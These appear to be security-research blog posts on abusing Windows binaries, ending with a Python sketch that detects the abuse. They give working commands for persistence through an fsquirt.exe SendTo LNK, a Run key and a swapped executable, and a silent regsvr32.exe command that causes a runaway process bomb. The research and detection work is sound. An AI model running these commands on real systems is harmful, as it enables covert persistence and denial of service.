1 little known secret of fsquirt.exe

The program in the title of this post is not very well-known. It’s being used for some random Bluetooth stuff that not too many PC users care about (okay, it’s a bit of a stretch, but I guess it’s really not very well-known).

How do you make use of a binary no one cares about?

When I first looked at fsquirt.exe‘s command line arguments, I immediately thought of using it in my Beyond Good Ol’ Run key series, as it seemed a perfect candidate. Despite behaving predictably and delivering what I needed it to, though, I could not write the new post in that series, because the intended trick simply didn’t work.

I know it sounds dramatic, but this is the nature of research.

I still wanted to make a triumph of the discovery though, so here we are…

When you run fsquirt.exe with the -Register argument, it creates the LNK file c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK, which leads Explorer to add the following item under your Send To submenu:

Running it with the -UnRegister argument removes this entry.

But here’s the secret…

Run:

c:\windows\System32\fsquirt.exe -Register

This ensures that the following LNK file is created:

c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

Add a legitimate Run entry pointing to the LNK created in the last step:

reg add "hkcu\software\microsoft\windows\currentversion\run" /v foo /d "c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK"

Copy c:\windows\System32\fsquirt.exe to a different folder, for example c:\test, by running a command like this:

copy c:\windows\System32\fsquirt.exe c:\test

Re-register it to a different location:

c:\test\fsquirt.exe -Register

This will overwrite the LNK file above to point to c:\test\fsquirt.exe.

Overwrite c:\test\fsquirt.exe with any executable of your choice. Now you have an executable that will run any time the user logs on.

It’s a classic bait and switch.

1 little known secret of regsvr32.exe, take three

In the past I have written a few times about the side effect of having two binaries with the same name residing in the System32 and SysWOW64 directories respectively.

Regsvr32.exe is no different. If you run the 32-bit Regsvr32.exe with a command line argument that is a path to a 64-bit DLL or OCX, it will spawn its 64-bit twin Regsvr32.exe to handle the request:

I am happy to report that regsvr32.exe uses the GetSystemDirectoryW and GetSystemWow64Directory2W APIs, instead of relying on environment variables, to build the paths to the respective binaries, so there is definitely less chance of lolbin-ish abuse.

Now, this is not the little known secret yet.

The secret is this:

When you force the regsvr32.exe of one architecture to spawn the regsvr32.exe of the other architecture, the command line argument you started with is passed to the child regsvr32.exe process, in full.

Do you see where it is going?

Based on the idea from post number one in this series, we now know we can pass a list of library names (the limit is 256) to regsvr32.exe and it will load them all one by one. What if we passed a command line argument that interleaves 32-bit and 64-bit libraries?

The result is a never-ending, chain-reaction-like tree of interleaving regsvr32.exe processes, executed one by one!

Do you want to test it at home?

Warning: do not try this at home!

regsvr32.exe c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\syswow64\hhctrl.ocx c:\WINDOWS\sysnative\hhctrl.ocx

As far as I can tell this is the first documented case where c:\WINDOWS\system32\, c:\WINDOWS\syswow64\, and c:\WINDOWS\sysnative\ have ever been used together in a command line of any program.

And yes, you can add the /s parameter to it too, that is, if you don’t want any control over it (/s stands for silent and disables any GUI feedback from regsvr32.exe)!

regsvr32.exe /s c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\syswow64\hhctrl.ocx c:\WINDOWS\sysnative\hhctrl.ocx

Be warned though! This is a regsvr32.exe bomb! And it’s a possible DOLBIN!
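Both tricks leave a recognisable footprint for defenders: a Run value that launches a user-writable LNK whose target has drifted away from System32, and a regsvr32.exe command line registering several modules spread across System32, SysWOW64 and Sysnative. The following detection sketch is an added example, not code from the original posts; it runs over constructed sample data, and the LNK_TARGETS lookup stands in for a real LNK parser.

```python
import re

# Constructed sample telemetry, not captured data: two HKCU Run values and
# three regsvr32.exe command lines modelled on the tricks described above.
RUN_VALUES = {
    "foo": r"c:\Users\alice\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK",
    "Updater": r"C:\Program Files\Vendor\updater.exe /background",
}
# Stand-in for a LNK parser (constructed): the re-registered LNK now resolves
# to the copied binary in c:\test rather than to System32.
LNK_TARGETS = {RUN_VALUES["foo"].lower(): r"c:\test\fsquirt.exe"}
REGSVR32_CMDLINES = [
    r"regsvr32.exe /s c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\syswow64\hhctrl.ocx c:\WINDOWS\sysnative\hhctrl.ocx",
    r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx",
    r"regsvr32.exe c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\system32\msxml3.dll",
]
SYSTEM_DIRS = ("system32", "syswow64", "sysnative")
# Module paths may contain spaces, so match lazily up to the .ocx/.dll suffix.
MODULE_RE = re.compile(r"[a-z]:\\.+?\.(?:ocx|dll)\b", re.I)


def suspicious_run_values(run_values, lnk_targets):
    """Flag Run values that launch a LNK under the user's profile (e.g. SendTo)
    whose resolved target is not the original System32 binary."""
    hits = []
    for name, data in run_values.items():
        path = data.strip('"').lower()
        if not path.endswith(".lnk") or "\\appdata\\" not in path:
            continue
        target = lnk_targets.get(path, "")
        if not target.lower().startswith("c:\\windows\\system32\\"):
            hits.append((name, target))
    return hits


def mixed_arch_regsvr32(cmdlines):
    """Flag regsvr32 command lines that register several modules spread over
    more than one of System32/SysWOW64/Sysnative, the pattern that makes the
    32-bit and 64-bit regsvr32.exe keep spawning each other."""
    hits = []
    for cmd in cmdlines:
        modules = [m.lower() for m in MODULE_RE.findall(cmd)]
        dirs = {d for m in modules for d in SYSTEM_DIRS if "\\" + d + "\\" in m}
        if len(modules) > 1 and len(dirs) > 1:
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for name, target in suspicious_run_values(RUN_VALUES, LNK_TARGETS):
        print(f"Run value {name!r} launches a LNK resolving to {target!r}")
    for cmd in mixed_arch_regsvr32(REGSVR32_CMDLINES):
        print("mixed-architecture regsvr32 registration:", cmd)
```

On a live host the same two checks would be fed from the HKCU Run key and from process creation telemetry (Sysmon event 1 or 4688 with command line logging), with the LNK target read from the shell link file itself.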